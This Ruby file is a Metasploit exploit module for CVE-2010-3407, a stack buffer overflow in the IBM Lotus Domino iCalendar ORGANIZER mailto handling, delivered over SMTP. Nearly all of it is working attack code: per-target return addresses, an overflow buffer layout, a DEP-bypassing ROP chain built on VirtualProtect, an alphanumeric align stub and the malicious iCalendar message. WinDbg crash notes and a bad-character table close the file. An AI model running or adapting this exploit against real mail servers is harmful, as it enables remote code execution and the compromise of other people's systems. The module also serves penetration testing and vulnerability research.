##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
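class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Bytes that the WinDbg notes at the bottom of this file show being rewritten
  # on the way to the vulnerable Cstrcpy() or terminating the copy early
  # ("nocrash").  0x0a-0x0f are listed there as bad but were missing from the
  # original list; 0x09 and 0x19 were never tested, so they stay allowed.
  # The payload is forced through an alphanumeric encoder anyway, so this list
  # only matters if someone changes EncoderType.
  BAD_CHARS = (
    [*(0x00..0x08)].pack("C*") +
    [*(0x0a..0x0f)].pack("C*") +
    [*(0x10..0x18)].pack("C*") +
    [*(0x1a..0x1f)].pack("C*") +
    "\x2c" +
    [*(0x80..0xff)].pack("C*")
  ).freeze

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "IBM Lotus Domino iCalendar MAILTO Buffer Overflow",
      'Description'    => %q{
        This module exploits a vulnerability found in IBM Lotus Domino iCalendar. By
        sending a long string of data as the "ORGANIZER;mailto" header, process "nRouter.exe"
        crashes due to a Cstrcpy() routine in nnotes.dll, which allows remote attackers to
        gain arbitrary code execution.

        Note: In order to trigger the vulnerable code path, a valid Domino mailbox account
        is needed.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'A. Plaskett', # Initial discovery, poc
          'sinn3r'       # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2010-3407' ],
          [ 'OSVDB', '68040' ],
          [ 'ZDI', '10-177' ],
          [ 'URL', 'http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/' ],
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515' ]
        ],
      'Payload'        =>
        {
          'BadChars'        => BAD_CHARS,
          # The two non-DEP targets return into a JMP ECX and the DEP target's
          # align stub rebuilds ECX from the stack, so the alphanumeric decoder
          # can locate itself through ECX instead of a getpc stub.
          'EncoderType'     => Msf::Encoder::Type::AlphanumMixed,
          'EncoderOptions'  => { 'BufferRegister' => 'ECX' },
          # NOTE(review): -3500 is carried over from the original; why this
          # particular distance is needed is not documented anywhere here.
          'StackAdjustment' => -3500
        },
      'DefaultOptions' =>
        {
          # The payload runs inside nRouter.exe (the process that overflowed),
          # so an ExitProcess exit takes the mail router down with it.
          'EXITFUNC' => "process",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Lotus Domino 8.5 on Windows 2000 SP4',
            {
              'Offset'    => 2374,       # Offset to EIP
              'Ret'       => 0x6030582B, # JMP ECX
              'MaxBuffer' => 9010        # Total buffer size
            }
          ],
          [
            'Lotus Domino 8.5 on Windows Server 2003 SP0',
            {
              'Offset'    => 2374,       # Offset to EIP
              'Ret'       => 0x6030582B, # JMP ECX (Domino\\nnotes.dll)
              'MaxBuffer' => 9010        # Total buffer size
            }
          ],
          [
            'Lotus Domino 8.5 on Windows Server 2003 SP2',
            {
              'Offset'    => 2374,       # Offset to EIP
              'Ret'       => 0x604C4222, # ADD AL,0x5E ; RETN
              'EAX'       => 0x7C35287F, # Initial CALL VirtualProtect addr to align (MSVCR71.dll)
              'EaxOffset' => 2342,       # Offset to EAX
              'RopOffset' => 24,         # Offset to ROP gadgets
              'MaxBuffer' => 9010        # Total buffer size
            }
          ],
        ],
      'DisclosureDate' => '2010-09-14',
      'DefaultTarget'  => 2))

    register_options(
      [
        Opt::RPORT(25),
        OptString.new('MAILFROM', [true, 'Valid Lotus Domino mailbox account', '']),
        OptString.new('MAILTO', [true, 'Valid Lotus Domino mailbox account', ''])
      ])
  end

  # Fingerprints the SMTP greeting.  An empty greeting (timeout, firewall,
  # banner suppressed) is reported as Unknown rather than Safe, because it
  # proves nothing about the version.
  def check
    connect
    banner = (sock.get_once(-1, 5) || '').chomp
    disconnect

    return Exploit::CheckCode::Unknown if banner.empty?
    return Exploit::CheckCode::Appears if banner =~ /Lotus Domino Release 8\.5/

    Exploit::CheckCode::Safe
  end

  # Builds the overflowing ORGANIZER address, wraps it in an iCalendar COUNTER
  # message and delivers it over SMTP.  Every envelope step is checked for a
  # positive reply: a rejected MAIL FROM / RCPT TO (wrong mailbox, relaying
  # denied) or a refused DATA means the body would never reach nRouter's
  # parser, and the original silently carried on in that case.
  def exploit
    sploit = build_sploit
    body   = build_calendar(sploit)

    print_status("Trying target #{target.name}")

    connect

    # Get SMTP Banner
    banner = (sock.get_once || '').chomp
    print_status("Banner: #{banner}")

    # Check banner before trying the exploit (same anchored pattern as check;
    # the dot is escaped so "8.5" cannot match e.g. "8X5")
    unless banner =~ /Lotus Domino Release 8\.5/
      print_error("Remote service does not seem to be Lotus Domino 8.5")
      disconnect
      return
    end

    smtp_step('HELO',      "HELO localhost\r\n",                          /\A250/)
    smtp_step('MAIL FROM', "MAIL FROM: <#{datastore['MAILFROM']}>\r\n",  /\A250/)
    smtp_step('RCPT TO',   "RCPT TO: <#{datastore['MAILTO']}>\r\n",      /\A25[01]/)
    smtp_step('DATA',      "DATA\r\n",                                    /\A354/)

    # Send malicious data.  The reply is deliberately not checked: if the
    # overflow fired, nRouter may already be gone and no reply will come.
    sock.put(body)
    sock.get_once

    # QUIT
    sock.put("QUIT\r\n")
    res = sock.get_once || ''
    print_status("Received: #{res.chomp}")

    handler
    disconnect
  end

  private

  # Sends one SMTP command and returns the (chomped) reply.  Aborts the run
  # with UnexpectedReply when the reply code does not match +expected+ (a nil
  # read — ten seconds of silence — is treated the same way).
  def smtp_step(label, cmd, expected)
    sock.put(cmd)
    res = (sock.get_once || '').chomp
    print_status("Received: #{res}")
    unless res =~ expected
      fail_with(Failure::UnexpectedReply, "#{label} was rejected: #{res.empty? ? '(no reply)' : res}")
    end
    res
  end

  # Appends random alpha padding to +buf+ so that its length becomes +len+.
  # Aborts instead of silently doing nothing when +buf+ is already longer than
  # +len+: rand_text_alpha() of a negative count returns "", which would shift
  # every later offset (EIP, EAX, ROP chain) and turn the exploit into a
  # plain crash.  Returns +buf+.
  def pad_to(buf, len, what)
    needed = len - buf.length
    if needed < 0
      fail_with(Failure::BadConfig, "#{what} exceeds the available space by #{-needed} byte(s); pick a smaller payload")
    end
    buf << rand_text_alpha(needed)
  end

  # Alphanumeric stub that derives ECX from the stack pointer for the DEP
  # target (PUSH ECX / POP EAX / XOR AL,43 / INC EAX / XOR AL,65 / PUSH EAX /
  # POP ECX), so the decoder's BufferRegister points at the shellcode.
  def align_stub
    "\x51" +       # PUSH ECX
    "\x58" +       # POP EAX
    "\x34\x43" +   # XOR AL,43
    "\x40" +       # INC EAX
    "\x34\x65" +   # XOR AL,65
    "\x50" +       # PUSH EAX
    "\x59"         # POP ECX
  end

  # ROP chain for the Windows Server 2003 SP2 target.  It borrows a
  # "CALL VirtualProtect()" in Domino's MSVCR71.dll to bypass DEP: EAX has
  # been pre-loaded (target['EAX'] + the Ret gadget's ADD AL,5E) with the
  # call address, and the chain writes that plus the VirtualProtect arguments
  # through ECX before pivoting ESP onto it.
  def rop_chain
    [
      # EAX should be aligned to CALL VirtualProtect at this point
      0x604F5728, # MOV DWORD PTR DS:[ECX],EAX; RETN (nnotes.dll)
      # Set shellcode address
      0x6247282B, # MOV EAX,ECX; RETN (nlsccstr.dll)
      0x62454F32, # ADD AL,2B; RETN (nlsccstr.dll)
      0x603F7B38, # ADD AL,31; RETN (nnotes.dll)
      0x624B7040, # MOV DWORD PTR DS:[ECX+4],EAX; RETN (nnotes.dll)
      # Set RETN value
      0x60577B7A, # XCHG EAX,EDX; RETN (nnotes.dll)
      0x62452E35, # MOV EAX,ECX; RETN (nlsccstr.dll)
      0x60606F4E, # ADD AL,5D; RETN (nlsccstr.dll)
      0x603E6260, # DEC EAX; RETN (nnotes.dll)
      0x603E6260, # DEC EAX; RETN (nnotes.dll)
      0x603E6260, # DEC EAX; RETN (nnotes.dll)
      0x603E6260, # DEC EAX; RETN (nnotes.dll)
      0x603E6260, # DEC EAX; RETN (nnotes.dll)
      0x7C3A4C72, # MOV DWORD PTR DS:[EAX],EDX; RETN (msvcp71.dll)
      0x6247282B, # MOV EAX,ECX; RETN (nlsccstr.dll)
      0x60253B6D, # XCHG EAX,EBP; RETN (nnotes.dll)
      # Set Size (0x413)
      0x605A4B30, # MOV EAX,205; RETN (nnotes.dll)
      0x605A4B30, # MOV EAX,205; RETN (nnotes.dll)
      0x60592A36, # ADD EAX,107; RETN (nnotes.dll)
      0x603B4C27, # ADD AL,2B; RETN (nnotes.dll)
      0x624B7044, # MOV DWORD PTR DS:[ECX+8],EAX; RETN
      0x604C5225, # XOR EAX, EAX; RETN
      # newProtect
      0x60386C3C, # MOV AL,3B; RETN (nnotes.dll)
      0x624D4C27, # INC EAX; RETN (nlsccstr.dll)
      0x624D4C27, # INC EAX; RETN (nlsccstr.dll)
      0x624D4C27, # INC EAX; RETN (nlsccstr.dll)
      0x624D4C27, # INC EAX; RETN (nlsccstr.dll)
      0x624D4C27, # INC EAX; RETN (nlsccstr.dll)
      0x624B7048, # MOV DWORD PTR DS:[ECX+C],EAX; RETN
      # oldProtect
      0x602B7353, # MOV EAX,ESI; POP ESI; RETN (nnotes.dll)
      0x41414141, # ESI
      0x624B704C, # MOV DWORD PTR DS:[ECX+10],EAX; RETN (nlsccstr.dll)
      # Call VirtualProtect
      0x6247282B, # MOV EAX,ECX; RETN (nlsccstr.dll)
      0x60276256  # XCHG EAX,ESP; RETN (nnotes.dll)
    ].pack("V*")
  end

  # Lays out the overflow buffer for the selected target and returns it.
  # Layouts (offsets are absolute positions in the buffer):
  #   2000 SP4 / 2003 SP0: pad | shellcode | pad to Offset | JMP ECX | pad to MaxBuffer
  #   2003 SP2:            pad | align | shellcode | pad to EaxOffset | EAX |
  #                        pad to Offset | Ret | RopOffset bytes | ROP | pad to MaxBuffer
  # Shellcode room is therefore 1440 / 1444 / 1311 bytes respectively; an
  # encoded payload larger than that aborts with BadConfig via pad_to.
  def build_sploit
    buf = ''

    case target.name
    when /Windows 2000 SP4/
      buf << rand_text_alpha(934)
      buf << payload.encoded
      pad_to(buf, target['Offset'], 'Shellcode')
      buf << [target.ret].pack('V')
    when /Server 2003 SP0/
      buf << rand_text_alpha(930)
      buf << payload.encoded
      pad_to(buf, target['Offset'], 'Shellcode')
      buf << [target.ret].pack('V')
    when /Server 2003 SP2/
      # shellcode max = 1311 bytes (EaxOffset - 1022 - align stub)
      buf << rand_text_alpha(1022)
      buf << align_stub
      buf << payload.encoded
      pad_to(buf, target['EaxOffset'], 'Shellcode')
      buf << [target['EAX']].pack('V')
      pad_to(buf, target['Offset'], 'Buffer')
      buf << [target.ret].pack('V')
      buf << rand_text_alpha(target['RopOffset'])
      buf << rop_chain
    else
      # Unreachable with the targets declared above; kept so that adding a
      # target without a layout fails loudly instead of sending an empty address.
      fail_with(Failure::NoTarget, "No buffer layout for target '#{target.name}'")
    end

    pad_to(buf, target['MaxBuffer'], 'Buffer')
  end

  # Wraps +sploit+ in the iCalendar COUNTER message (MIME headers included,
  # terminated with the SMTP end-of-data sequence) that drives nRouter into
  # MailCheck821Address.  The bare "<name>.txt" line directly after the
  # Content-Type header is kept as in the original PoC.  +sploit+ is
  # alphanumeric, so no CRLF or leading-dot escaping is required.
  def build_calendar(sploit)
    fname   = rand_text_alpha(4)
    prod_id = rand_text_alpha_upper(5) + "@" + rand_text_alpha_upper(13) + "@" + rand_text_alpha_upper(24)
    uid     = rand_text_alpha_upper(15)
    summary = rand_text_alpha_upper(5) + "@" + rand_text_alpha_upper(11)
    status  = rand_text_alpha_upper(4)

    lines = [
      "Content-Type: text/calendar; method=COUNTER; charset=UTF-8",
      "#{fname}.txt",
      "MIME-Version: 1.0",
      "Content-Transfer-Encoding: 8bit",
      "BEGIN:VCALENDAR",
      "METHOD:COUNTER",
      "PRODID:-//#{prod_id}//",
      "VERSION:2.0",
      "BEGIN:VEVENT",
      "UID:#{uid}",
      "SEQ:2",
      "RRULE:aaaa",
      "ORGANIZER:mailto:H@#{sploit}.com",
      "ATTENDEE;:Mailto:#{datastore['MAILTO']}",
      "SUMMARY:#{summary}",
      "DTSTART:20091130T093000Z",
      "DTEND:20091130T093000Z",
      "DTSTAMP:20091130T083147Z",
      "LOCATION:Location",
      "STATUS:#{status}",
      "END:VEVENT",
      "END:VCALENDAR",
      "",
      "."
    ]

    lines.join("\r\n") + "\r\n"
  end
end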
=begin
0:008> r
eax=41414141 ebx=00000004 ecx=08da9700 edx=08dab695 esi=06c248bc edi=00000014
eip=42424242 esp=08da9cc0 ebp=41414141 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
42424242 ?? ???
0:008> !exchain
08daea2c: nRouter+511bb (004511bb)
08daffdc: kernel32!_except_handler3+0 (77e70abc)
CRT scope 0, filter: kernel32!BaseThreadStart+3a (77e4a92d)
func: kernel32!BaseThreadStart+4b (77e4a943)
Invalid exception stack at ffffffff
0:008> k
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
08da9cbc 43434343 0x42424242
08da9cc0 43434343 0x43434343
...
0:008> bl
0 e 602738f9 0001 (0001) 0:**** nnotes!MailCheck821Address+0xb09
0:008> u 602738f9
nnotes!MailCheck821Address+0xb09:
602738f9 e80239d9ff call nnotes!Cstrcpy (60007200)
602738fe eb02 jmp nnotes!MailCheck821Address+0xb12 (60273902)
60273900 33ff xor edi,edi
60273902 8d8dc0faffff lea ecx,[ebp-540h]
60273908 51 push ecx
60273909 8d95bcf6ffff lea edx,[ebp-944h]
6027390f 52 push edx
60273910 e8eb38d9ff call nnotes!Cstrcpy (60007200)

Badchars:
0x01=0x0F21, 0x02=0x0f22, 0x03=0x0f23, 0x04=0x0f24, 0x05=0x0f25, 0x06=0x0f26, 0x07=0x0f27
0x08=0x0f28, 0x0a=nocrash, 0x0b=0x0f2b, 0x0c=0x0f2c, 0x0d=nocrash, 0x0e=0x0f2e, 0x0f=0x0f2f,
0x10=0x0f30, 0x11=0x0f31, 0x12=0x0f32, 0x13=0x0f33, 0x14=0x0f34, 0x15=0x0f35, 0x16=0x0f36,
0x17=0x0f37, 0x18=0x0f38, 0x1a=0x0f3a, 0x1b=0x0f3b, 0x1c=0x0f3c, 0x1d=0x0f3d, 0x1e=0x0f3e,
0x1f=0x0f3f, 0x2c=nocrash, 0x80..0xff = ""
=end